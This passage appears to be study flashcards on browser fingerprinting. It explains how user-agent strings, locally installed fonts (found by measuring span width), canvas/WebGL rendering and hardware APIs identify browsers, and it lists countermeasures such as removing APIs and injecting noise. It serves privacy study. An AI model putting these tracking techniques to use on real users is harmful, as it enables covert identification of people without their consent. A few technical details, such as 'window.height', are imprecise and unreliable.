- The depth of fingerprints.
What is the breath of fingerprints (in a fingerprinting context)?
It refers to the number of semi-identifiers available to perform fingerprinting.
What is the depth of fingerprints (in a fingerprinting context)?
It refers to the degree of uniqueness each identifier can provide.
How can one extract the User Agent string header to use as a semi-identifier for fingerprinting?
You can extract easily:
- navigator.userAgent
What are the 3 categories of fonts?
System
Local
Web
What are fonts that belong to the system category?
They are the fonts provided by the OS. Whether its WIndows, Mac, Linux, etc
What are fonts that belong to the web category?
They are the fonts that are instructed by the webpage we should use. Sometimes they are added via a request to a 3rd party source and sometimes they are provided within the same web server.
What are fonts that belong to the local category?
They are the fonts that the user has explicitly installed
Which one of the 3 categories of fonts is the one that is used for fingerprinting?
Local fonts
How can one extract the Local Fonts as a semi-identifier for fingerprinting?
There isn’t a direct way of doing it. However it can done with the following steps:
- Setup or get the list of fonts to test with
- Setup a span tag with text inside (or any other one).
- Apply the font to the span
- Measure the width of the span
- If the width changes, it means the user has that font available on their system.
How does fingerprinting with Canvas / WebGL work?
With the canvas API you can setup some standardized drawings and then you can analyze them.
Depending on the browser and hardware, the result can be subtly different. Of course these differences aren’t visible to the naked eye.
How can you perform fingerprinting to detect hardware semi-identifiers?
Many Web APIs are known for leaking certain capabilities such as:
- number of cores (HTML)
- number of audio channels (Web Audio API)
- number of shaders and similar (WebGL API)
- device memory (Device Memory API)
- network (WebRTC, Network status API)
How can you extract the height and width information of the window for fingerprinting?
You can access it via JS window.height and window. width.
However in cas that is not reliable enough you can look at the distribution of the HTML elements on the page.
How can fingerprinting be implemented easily in practice?
Store the results in a database.
Hash each endpoint
Hash each value into a single identifier.
What are some fingerprinting countermeasures?
- Remove unneeded functionality
- Make the functionality as consistent as possible.
- Restrict access and permissions .
- Noise randomization
What kind of functionality can you remove from your website in order to countermeasure fingerprinting?
Deletes JS endpoints
Remove the HTTP header
Remove the runtime capability
Remove the APIs usage, like canvas
What kind of functionality can you try to make consistent in your website in order to countermeasure fingerprinting?
Basically by removing unneeded functionality and restricting access and permissions.
What kind of functionality can you restrict access to your website in order to countermeasure fingerprinting?
Permission prompts to functionalities like video, audio, or geolocation access.
Give access to only a certain range of user gestures. (User gestures are commands or behaviours commonly done by users. An example is the “I’m not a robot” prompt)
Give access to a whitelist of 1st and 3rd parties.
What is steganography?
A technique that involves hiding information within an ordinary, non-secret file or message, so that it will not be detected.
How do you translate steganography into spanish?
Esteganografía
How can you inject noise into fingerprinting semi-identifiers?
By using steganography.
You can change an specific bit or bits of every image. The users will not notice it. But the fingerprinting tracking will fail.